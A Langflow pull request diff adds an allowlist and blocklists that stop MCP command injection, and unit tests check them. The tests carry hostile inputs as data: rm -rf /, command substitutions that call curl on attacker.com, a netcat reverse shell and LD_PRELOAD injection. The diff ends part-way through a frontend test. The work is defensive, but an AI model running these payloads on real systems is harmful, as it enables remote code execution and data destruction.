### PR TITLE
fix: add MCP command injection security validation with allowlist, ar…

### DIFF
--- a/src/backend/base/langflow/api/v2/schemas.py
+++ b/src/backend/base/langflow/api/v2/schemas.py
@@ -1,6 +1,91 @@
 """Pydantic schemas for v2 API endpoints."""
 
-from pydantic import BaseModel
+from pathlib import Path
+
+from pydantic import BaseModel, ConfigDict, field_validator, model_validator
+
+from langflow.logging import logger
+
+# SECURITY: Allowlist of approved MCP stdio commands
+# Following Flowise best practice: https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L166
+ALLOWED_MCP_COMMANDS = frozenset(
+    {
+        "node",
+        "python",
+        "python3",
+        "npx",
+        "uvx",
+        "docker",
+    }
+)
+
+# SECURITY: Shell metacharacters that enable command injection
+DANGEROUS_SHELL_CHARS = frozenset({";", "|", "&", "$", "`", "<", ">", "(", ")", "\n", "\r"})
+
+# SECURITY: Keywords that enable code execution or package installation
+DANGEROUS_KEYWORDS = frozenset(
+    {
+        "-c",
+        "-e",
+        "-y",
+        "--yes",
+        "pip",
+        "install",
+        "npm",
+        "yarn",
+        "pnpm",
+        "eval",
+        "exec",
+    }
+)
+
+# SECURITY: Environment variables that enable code injection via approved commands.
+# Grouped by attack category. All comparisons are case-insensitive.
+DANGEROUS_ENV_VARS = frozenset(
+    {
+        # -- Shared-object / dylib injection (arbitrary native code execution) --
+        "ld_preload",
+        "ld_library_path",
+        "ld_audit",
+        "dyld_insert_libraries",
+        "dyld_library_path",
+        # -- glibc iconv module injection (loads arbitrary .so via iconv) --
+        "gconv_path",
+        # -- Command resolution override (redirects which binary bash executes) --
+        "path",
+        # -- Shell startup-script injection (bash executes these before the command) --
+        "bash_env",
+        "env",
+        "bash_func_",  # Shellshock-style function export prefix
+        # -- Shell word-splitting / globbing manipulation --
+        "ifs",
+        "cdpath",
+        # -- Node.js code injection --
+        "node_options",
+        "node_extra_ca_certs",
+        # -- Python code injection --
+        "pythonstartup",
+        "pythonpath",
+        # -- Home / config directory redirection (loads attacker-controlled configs) --
+        "home",
+        "xdg_config_home",
+        "xdg_data_home",
+        # -- Temp directory redirection --
+        "tmpdir",
+        "tmp",
+        "temp",
+        # -- DNS / network manipulation --
+        "hostaliases",
+        "localdomain",
+        "res_options",
+        # -- Locale / getconf injection (can load arbitrary .so on some glibc) --
+        "getconf_dir",
+    }
+)
+
+# SECURITY: Docker-specific arguments that break container isolation
+DOCKER_DANGEROUS_ARGS = frozenset({"--privileged", "--cap-add"})
+DOCKER_DANGEROUS_ARG_PREFIXES = ("--net=", "--network=", "--pid=", "--cap-add=", "--privileged=")
 
 
 class MCPServerConfig(BaseModel):
@@ -12,5 +97,160 @@ class MCPServerConfig(BaseModel):
     headers: dict[str, str] | None = None
     url: str | None = None
 
-    class Config:
-        extra = "allow"  # Allow additional fields for flexibility
+    model_config = ConfigDict(extra="allow")
+
+    @field_validator("command")
+    @classmethod
+    def validate_command(cls, v: str | None) -> str | None:
+        """Validate MCP command against allowlist to prevent command injection.
+
+        This prevents attackers from executing arbitrary commands via the MCP stdio interface.
+        Only approved MCP server executables are allowed.
+
+        Args:
+            v: The command string to validate
+
+        Returns:
+            The validated command string
+
+        Raises:
+            ValueError: If the command is not in the allowlist
+        """
+        if v is None:
+            return None
+
+        base_command = _extract_base_command(v)
+
+        if base_command not in ALLOWED_MCP_COMMANDS:
+            allowed_list = ", ".join(sorted(ALLOWED_MCP_COMMANDS))
+            msg = f"Command '{base_command}' is not allowed for security reasons. Allowed commands: {allowed_list}"
+            logger.warning("MCP command rejected: '{}' (full_path='{}')", base_command, v)
+            raise ValueError(msg)
+
+        return v
+
+    @field_validator("args")
+    @classmethod
+    def validate_args(cls, v: list[str] | None) -> list[str] | None:
+        """Validate MCP command arguments to prevent shell injection and code execution.
+
+        Blocks shell metacharacters and dangerous flags that could be used for
+        command injection, code execution, or package installation attacks.
+
+        Args:
+            v: The list of arguments to validate
+
+        Returns:
+            The validated arguments list
+
+        Raises:
+            ValueError: If any argument contains dangerous patterns
+        """
+        if v is None:
+            return None
+
+        for arg in v:
+            for char in DANGEROUS_SHELL_CHARS:
+                if char in arg:
+                    msg = f"Argument contains dangerous shell metacharacter '{char}': {arg}"
+                    logger.warning("MCP argument rejected - shell metacharacter '{}' in arg", char)
+                    raise ValueError(msg)
+
+        for arg in v:
+            if arg.lower() in DANGEROUS_KEYWORDS:
+                msg = f"Argument '{arg}' is not allowed for security reasons"
+                logger.warning("MCP argument rejected - dangerous keyword: '{}'", arg)
+                raise ValueError(msg)
+
+        return v
+
+    @field_validator("env")
+    @classmethod
+    def validate_env(cls, v: dict[str, str] | None) -> dict[str, str] | None:
+        """Validate environment variables to prevent code injection via approved commands.
+
+        Blocks environment variables that can force approved commands (node, python, etc.)
+        to load and execute attacker-controlled code (e.g. LD_PRELOAD, NODE_OPTIONS, PATH).
+
+        Args:
+            v: The environment variable dict to validate
+
+        Returns:
+            The validated environment dict
+
+        Raises:
+            ValueError: If any env var name is in the blocklist
+        """
+        if v is None:
+            return None
+
+        for key in v:
+            lower_key = key.lower()
+            if lower_key in DANGEROUS_ENV_VARS or lower_key.startswith("bash_func_"):
+                msg = f"Environment variable '{key}' is not allowed for security reasons"
+                logger.warning("MCP env var rejected: '{}'", key)
+                raise ValueError(msg)
+
+        return v
+
+    @model_validator(mode="after")
+    def validate_docker_args(self) -> "MCPServerConfig":
+        """Block Docker-specific arguments that break container isolation.
+
+        Only applies when the command resolves to ``docker``. Prevents
+        ``--privileged``, host-namespace sharing, and capability escalation.
+
+        Returns:
+            The validated config
+
+        Raises:
+            ValueError: If a dangerous Docker argument is detected
+        """
+        if not self.command or not self.args:
+            return self
+
+        base_command = _extract_base_command(self.command)
+        if base_command != "docker":
+            return self
+
+        for arg in self.args:
+            if arg in DOCKER_DANGEROUS_ARGS or arg.startswith(DOCKER_DANGEROUS_ARG_PREFIXES):
+                msg = f"Docker argument '{arg}' is not allowed for security reasons"
+                logger.warning("MCP Docker argument rejected: '{}'", arg)
+                raise ValueError(msg)
+
+        return self
+
+
+def _extract_base_command(command: str) -> str:
+    r"""Extract the base command name from a possibly fully-qualified path.
+
+    Handles Unix paths (``/usr/bin/node``), Windows paths
+    (``C:\\Program Files\\nodejs\\node.exe``), and bare names (``node``).
+
+    Also handles commands with arguments (e.g., "uvx mcp-server-fetch" or
+    "npx @scope/package") by extracting only the first token before any
+    whitespace, unless it's an actual file path.
+    """
+    # Check if this looks like an actual file path (not an npm scoped package)
+    # File paths either:
+    # - Start with / (Unix absolute)
+    # - Start with ./ or ../ (relative)
+    # - Contain \ (Windows)
+    # - Match drive letter pattern like C:\ (Windows absolute)
+    drive_letter_len = 3
+    is_file_path = (
+        command.startswith(("/", "./", "../"))
+        or "\\" in command
+        or (len(command) >= drive_letter_len and command[1:3] == ":\\")  # Windows drive letter
+    )
+
+    command_only = command.split()[0] if not is_file_path and command.strip() else command
+
+    normalized_path = command_only.replace("\\", "/")
+    base_command = Path(normalized_path).name
+
+    if base_command.lower().endswith(".exe"):
+        base_command = base_command[:-4]
+
+    return base_command

--- a/src/backend/tests/unit/test_mcp_command_injection_security.py
+++ b/src/backend/tests/unit/test_mcp_command_injection_security.py
@@ -1,0 +1,656 @@
+"""Security tests for MCP command injection vulnerability (CWE-78).
+
+This test suite validates that the MCP stdio server configuration properly
+validates commands against an allowlist to prevent arbitrary command execution.
+
+Vulnerability: Attackers with authenticated access (or unauthenticated via auth
+bypass) could add MCP stdio servers with arbitrary commands, achieving Remote
+Code Execution (RCE).
+
+Fix: Implement command allowlist, argument, env, and Docker argument validation
+in MCPServerConfig schema.
+"""
+
+import pytest
+from langflow.api.v2.schemas import ALLOWED_MCP_COMMANDS, DANGEROUS_ENV_VARS, MCPServerConfig
+from pydantic import ValidationError
+
+
+class TestMCPCommandInjectionSecurity:
+    """Test suite for MCP command injection security fixes."""
+
+    # ==================== Command Validation Tests ====================
+
+    def test_allowed_commands_accepted(self):
+        """Test that all allowed commands are accepted."""
+        for command in ALLOWED_MCP_COMMANDS:
+            config = MCPServerConfig(command=command, args=["--version"])
+            assert config.command == command
+
+    def test_allowed_command_with_path_accepted(self):
+        """Test that allowed commands with full paths are accepted."""
+        # Unix-style path
+        config = MCPServerConfig(command="/usr/bin/node", args=["server.js"])
+        assert config.command == "/usr/bin/node"
+
+        # Windows-style path
+        config = MCPServerConfig(command="C:\\Program Files\\nodejs\\node.exe", args=["server.js"])
+        assert config.command == "C:\\Program Files\\nodejs\\node.exe"
+
+    def test_dangerous_command_rejected(self):
+        """Test that dangerous commands are rejected."""
+        dangerous_commands = [
+            "rm",
+            "curl",
+            "wget",
+            "bash",
+            "sh",
+            "cmd",
+            "powershell",
+            "nc",
+            "netcat",
+            "telnet",
+        ]
+
+        for cmd in dangerous_commands:
+            with pytest.raises(ValidationError) as exc_info:
+                MCPServerConfig(command=cmd, args=["-rf", "/"])
+
+            error_msg = str(exc_info.value)
+            assert "not allowed" in error_msg.lower()
+            assert cmd in error_msg
+
+    def test_command_with_arguments_in_string_accepted(self):
+        """Test that commands with arguments in a single string are accepted (frontend compatibility).
+
+        Frontend tests pass commands like "uvx mcp-server-fetch" as a single string.
+        The validation should extract only the base command (uvx) for allowlist checking.
+        """
+        # This is how the frontend test passes the command
+        config = MCPServerConfig(command="uvx mcp-server-fetch", args=None)
+        assert config.command == "uvx mcp-server-fetch"
+
+        # Other examples
+        config = MCPServerConfig(command="npx @modelcontextprotocol/server-fetch", args=None)
+        assert config.command == "npx @modelcontextprotocol/server-fetch"
+
+        config = MCPServerConfig(command="python -m mcp_server", args=None)
+        assert config.command == "python -m mcp_server"
+
+    def test_command_injection_via_semicolon_rejected(self):
+        """Test that command injection via semicolon is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js; rm -rf /"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_pipe_rejected(self):
+        """Test that command injection via pipe is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js | bash"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_ampersand_rejected(self):
+        """Test that command injection via ampersand is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js & curl attacker.com"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_backticks_rejected(self):
+        """Test that command injection via backticks is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["`curl attacker.com`"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_dollar_sign_rejected(self):
+        """Test that command injection via dollar sign is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["$(curl attacker.com)"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_redirect_rejected(self):
+        """Test that command injection via redirect is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js > /tmp/pwned"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    def test_command_injection_via_newline_rejected(self):
+        """Test that command injection via newline is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js\nrm -rf /"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    # ==================== Dangerous Flags Tests ====================
+
+    def test_python_code_execution_flag_rejected(self):
+        """Test that Python -c flag is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="python3", args=["-c", "import os"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_python_pip_install_rejected(self):
+        """Test that Python pip install is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="python3", args=["-m", "pip", "install", "malicious-pkg"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+        assert "pip" in error_msg.lower()
+
+    def test_node_eval_flag_rejected(self):
+        """Test that Node -e flag is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["-e", "require 'child_process'"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_pip_install_rejected(self):
+        """Test that pip install is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="python3", args=["pip", "install", "malicious-package"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_npm_install_rejected(self):
+        """Test that npm install is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["npm", "install", "malicious-package"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_eval_keyword_rejected(self):
+        """Test that eval keyword is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["eval", "malicious code"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_exec_keyword_rejected(self):
+        """Test that exec keyword is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="python3", args=["exec", "malicious code"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    # ==================== Proof of Concept Tests ====================
+
+    def test_poc_touch_command_rejected(self):
+        """Test that the PoC 'touch' command from the security advisory is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="touch", args=["/tmp/pwned_langflow"])  # noqa: S108
+
+        error_msg = str(exc_info.value)
+        assert "touch" in error_msg
+        assert "not allowed" in error_msg.lower()
+
+    def test_poc_rm_command_rejected(self):
+        """Test that dangerous 'rm -rf' command is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="rm", args=["-rf", "/"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_poc_curl_reverse_shell_rejected(self):
+        """Test that reverse shell via curl is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="curl", args=["attacker.com/shell.sh"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_poc_netcat_reverse_shell_rejected(self):
+        """Test that netcat reverse shell is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="nc", args=["-e", "/bin/bash", "attacker.com", "4444"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    # ==================== Legitimate Use Cases ====================
+
+    def test_legitimate_node_mcp_server(self):
+        """Test that legitimate Node.js MCP server configuration is accepted."""
+        config = MCPServerConfig(
+            command="node",
+            args=["path/to/mcp-server.js"],
+            env={"DEBUG": "true"},
+        )
+        assert config.command == "node"
+        assert config.args == ["path/to/mcp-server.js"]
+
+    def test_legitimate_python_mcp_server(self):
+        """Test that legitimate Python MCP server configuration is accepted."""
+        config = MCPServerConfig(
+            command="python3",
+            args=["-m", "mcp_server"],
+            env={"MCP_LOG_LEVEL": "debug"},
+        )
+        assert config.command == "python3"
+        assert config.args == ["-m", "mcp_server"]
+
+    def test_legitimate_npx_mcp_server(self):
+        """Test that legitimate npx MCP server configuration is accepted."""
+        config = MCPServerConfig(
+            command="npx",
+            args=["@modelcontextprotocol/server-filesystem", "/tmp"],  # noqa: S108
+        )
+        assert config.command == "npx"
+        assert config.args is not None
+        assert len(config.args) == 2
+
+    def test_legitimate_uvx_mcp_server(self):
+        """Test that legitimate uvx MCP server configuration is accepted."""
+        config = MCPServerConfig(
+            command="uvx",
+            args=["mcp-server-git", "--repository", "/path/to/repo"],
+        )
+        assert config.command == "uvx"
+        assert config.args is not None
+        assert len(config.args) == 3
+
+    def test_legitimate_docker_mcp_server(self):
+        """Test that legitimate Docker MCP server configuration is accepted."""
+        config = MCPServerConfig(
+            command="docker",
+            args=["run", "-i", "mcp-server-image"],
+        )
+        assert config.command == "docker"
+        assert config.args is not None
+        assert config.args[0] == "run"
+
+    # ==================== Edge Cases ====================
+
+    def test_none_command_accepted(self):
+        """Test that None command is accepted (for HTTP-based MCP servers)."""
+        config = MCPServerConfig(url="https://mcp-server.example.com")
+        assert config.command is None
+        assert config.url == "https://mcp-server.example.com"
+
+    def test_empty_args_accepted(self):
+        """Test that empty args list is accepted."""
+        config = MCPServerConfig(command="node", args=[])
+        assert config.command == "node"
+        assert config.args == []
+
+    def test_none_args_accepted(self):
+        """Test that None args is accepted."""
+        config = MCPServerConfig(command="node")
+        assert config.command == "node"
+        assert config.args is None
+
+    def test_safe_special_chars_in_args_accepted(self):
+        """Test that safe special characters in args are accepted."""
+        config = MCPServerConfig(
+            command="node",
+            args=["server.js", "--port=8080", "--host=0.0.0.0", "--config=/path/to/config.json"],
+        )
+        assert config.command == "node"
+        assert config.args is not None
+        assert len(config.args) == 4
+
+    def test_windows_exe_extension_handled(self):
+        """Test that .exe extension on Windows is properly handled."""
+        config = MCPServerConfig(command="node.exe", args=["server.js"])
+        assert config.command == "node.exe"
+
+        config = MCPServerConfig(command="C:\\nodejs\\node.exe", args=["server.js"])
+        assert config.command == "C:\\nodejs\\node.exe"
+
+    # ==================== Error Message Quality ====================
+
+    def test_error_message_includes_allowed_commands(self):
+        """Test that error message includes list of allowed commands."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="malicious_command")
+
+        error_msg = str(exc_info.value)
+        # Check that error message includes at least some allowed commands
+        assert "node" in error_msg.lower() or "python" in error_msg.lower()
+        assert "allowed commands" in error_msg.lower()
+
+    def test_error_message_identifies_rejected_command(self):
+        """Test that error message identifies the specific rejected command."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="evil_command")
+
+        error_msg = str(exc_info.value)
+        assert "evil_command" in error_msg
+
+    def test_error_message_for_shell_metacharacter(self):
+        """Test that error message identifies the dangerous metacharacter."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["test; rm -rf /"])
+
+        error_msg = str(exc_info.value)
+        assert ";" in error_msg
+        assert "dangerous" in error_msg.lower()
+
+    # ==================== Npx/Uvx Auto-Install Prevention ====================
+
+    def test_npx_auto_install_flag_rejected(self):
+        """Test that npx -y (auto-install) flag is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="npx", args=["-y", "@malicious/package"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_npx_yes_flag_rejected(self):
+        """Test that npx --yes (auto-install) flag is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="npx", args=["--yes", "@malicious/package"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    # ==================== Subshell Metacharacter Tests ====================
+
+    def test_command_injection_via_subshell_parentheses_rejected(self):
+        """Test that command injection via subshell parentheses is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["(curl attacker.com)"])
+
+        error_msg = str(exc_info.value)
+        assert "dangerous shell metacharacter" in error_msg.lower()
+
+    # ==================== Environment Variable Injection Tests ====================
+
+    def test_ld_preload_env_rejected(self):
+        """Test that LD_PRELOAD env var is rejected (arbitrary shared object injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js"], env={"LD_PRELOAD": "/tmp/evil.so"})  # noqa: S108
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_node_options_env_rejected(self):
+        """Test that NODE_OPTIONS env var is rejected (Node.js code injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"NODE_OPTIONS": "--require /tmp/evil.js"},
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_pythonstartup_env_rejected(self):
+        """Test that PYTHONSTARTUP env var is rejected (Python code injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="python3",
+                args=["-m", "mcp_server"],
+                env={"PYTHONSTARTUP": "/tmp/evil.py"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_pythonpath_env_rejected(self):
+        """Test that PYTHONPATH env var is rejected (module shadowing attack)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="python3",
+                args=["-m", "mcp_server"],
+                env={"PYTHONPATH": "/attacker/modules"},
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_dyld_insert_libraries_env_rejected(self):
+        """Test that DYLD_INSERT_LIBRARIES env var is rejected (macOS code injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"DYLD_INSERT_LIBRARIES": "/tmp/evil.dylib"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_path_env_rejected(self):
+        """Test that PATH env var is rejected (command resolution hijacking).
+
+        The downstream _connect_to_server() merges user env AFTER setting PATH,
+        so a user-supplied PATH overrides which binary bash resolves.
+        """
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"PATH": "/tmp/evil:/usr/bin"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_ld_audit_env_rejected(self):
+        """Test that LD_AUDIT env var is rejected (shared object injection like LD_PRELOAD)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"LD_AUDIT": "/tmp/evil.so"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_gconv_path_env_rejected(self):
+        """Test that GCONV_PATH env var is rejected (glibc iconv module injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"GCONV_PATH": "/tmp/evil"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_home_env_rejected(self):
+        """Test that HOME env var is rejected (config directory redirection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"HOME": "/tmp/evil"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_tmpdir_env_rejected(self):
+        """Test that TMPDIR env var is rejected (temp directory redirection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"TMPDIR": "/tmp/evil"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_hostaliases_env_rejected(self):
+        """Test that HOSTALIASES env var is rejected (DNS manipulation)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"HOSTALIASES": "/tmp/evil_hosts"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_xdg_config_home_env_rejected(self):
+        """Test that XDG_CONFIG_HOME env var is rejected (config directory redirection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"XDG_CONFIG_HOME": "/tmp/evil"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_bash_env_rejected(self):
+        """Test that BASH_ENV env var is rejected (bash startup script injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"BASH_ENV": "/tmp/evil.sh"},  # noqa: S108
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_ifs_env_rejected(self):
+        """Test that IFS env var is rejected (shell word-splitting manipulation).
+
+        Commands are wrapped in bash -c, so IFS affects how bash parses the string.
+        """
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="node", args=["server.js"], env={"IFS": "/"})
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_bash_func_prefix_env_rejected(self):
+        """Test that BASH_FUNC_* env vars are rejected (Shellshock-style function injection)."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(
+                command="node",
+                args=["server.js"],
+                env={"BASH_FUNC_myfunc%%": "() { malicious; }"},
+            )
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_env_var_check_is_case_insensitive(self):
+        """Test that env var blocklist is case-insensitive."""
+        for variant in ["LD_PRELOAD", "ld_preload", "Ld_Preload", "LD_preload"]:
+            with pytest.raises(ValidationError):
+                MCPServerConfig(command="node", args=["server.js"], env={variant: "/tmp/evil.so"})  # noqa: S108
+
+    def test_all_dangerous_env_vars_blocked(self):
+        """Test that every entry in DANGEROUS_ENV_VARS is actually blocked."""
+        for env_var in DANGEROUS_ENV_VARS:
+            with pytest.raises(ValidationError):
+                MCPServerConfig(
+                    command="node",
+                    args=["server.js"],
+                    env={env_var.upper(): "malicious_value"},
+                )
+
+    def test_safe_env_vars_accepted(self):
+        """Test that safe environment variables are accepted."""
+        config = MCPServerConfig(
+            command="node",
+            args=["server.js"],
+            env={"DEBUG": "true", "PORT": "8080", "API_KEY": "secret123"},  # pragma: allowlist secret
+        )
+        assert config.env is not None
+        assert config.env["DEBUG"] == "true"
+
+    def test_none_env_accepted(self):
+        """Test that None env is accepted."""
+        config = MCPServerConfig(command="node", args=["server.js"])
+        assert config.env is None
+
+    # ==================== Docker-Specific Security Tests ====================
+
+    def test_docker_privileged_rejected(self):
+        """Test that docker --privileged is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="docker", args=["run", "--privileged", "mcp-image"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_docker_net_host_rejected(self):
+        """Test that docker --net=host is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="docker", args=["run", "--net=host", "mcp-image"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_docker_network_host_rejected(self):
+        """Test that docker --network=host is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="docker", args=["run", "--network=host", "mcp-image"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_docker_pid_host_rejected(self):
+        """Test that docker --pid=host is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="docker", args=["run", "--pid=host", "mcp-image"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_docker_cap_add_rejected(self):
+        """Test that docker --cap-add is rejected."""
+        with pytest.raises(ValidationError) as exc_info:
+            MCPServerConfig(command="docker", args=["run", "--cap-add=SYS_ADMIN", "mcp-image"])
+
+        error_msg = str(exc_info.value)
+        assert "not allowed" in error_msg.lower()
+
+    def test_docker_safe_args_accepted(self):
+        """Test that safe Docker arguments are accepted."""
+        config = MCPServerConfig(
+            command="docker",
+            args=["run", "--rm", "-i", "mcp-server-image"],
+        )
+        assert config.command == "docker"
+        assert config.args is not None
+        assert "--rm" in config.args
+
+    def test_docker_dangerous_args_not_applied_to_other_commands(self):
+        """Test that Docker-specific restrictions don't affect other commands."""
+        config = MCPServerConfig(
+            command="node",
+            args=["server.js", "--network=localhost"],
+        )
+        assert config.args is not None
+        assert "--network=localhost" in config.args
+
+    # ==================== Command Case Sensitivity Tests ====================
+
+    def test_uppercase_command_rejected(self):
+        """Test that uppercase command variants are rejected (allowlist is case-sensitive)."""
+        for cmd in ["NODE", "Node", "PYTHON3", "Python3", "NPX", "DOCKER"]:
+            with pytest.raises(ValidationError):
+                MCPServerConfig(command=cmd)

--- a/src/frontend/tests/extended/features/mcp-server-starter-projects.spec.ts
+++ b/src/frontend/tests/extended/features/mcp-server-starter-projects.spec.ts
@@ -119,6 +119,14 @@ test(
 
     await page.getByTestId("mcp-btn").click();
     await page.getByText("JSON").last().click();
+    
+    // Get the clipboard content to log what we're trying to add
+    const clipboardHandle = await page.evaluateHandle(() => navigator.clipboard.readText());
+    const clipboardContent = await clipboardHandle.jsonValue();
+    console.log("=== CLIPBOARD CONTENT ===");
+    console.log(clipboardContent);
+    console.log("=== END CLIPBOARD ===");
+    
     await page.getByTestId("icon-copy").click();
 
     await navigateSettingsPages(page, "Settings", "MCP Servers");
@@ -126,7 +134,47 @@ test(
     await page.getByTestId("add-mcp-server-button-page").click();
     await page.getByTestId("json-input").click();
     await page.keyboard.press(`ControlOrMeta+V`);
+    
+    // Log the JSON input value
+    const jsonInput = await page.getByTestId("json-input").inputValue();
+    console.log("=== JSON INPUT VALUE ===");
+    console.log(jsonInput);
+    console.log("=== END JSON INPUT ===");
+    
+    // Set up console message listener to catch any errors
+    page.on('console', msg => {
+      console.log(`BROWSER CONSOLE [${msg.type()}]:`, msg.text());
+    });
+    
+    // Set up response listener to catch API errors
+    page.on('response', async response => {
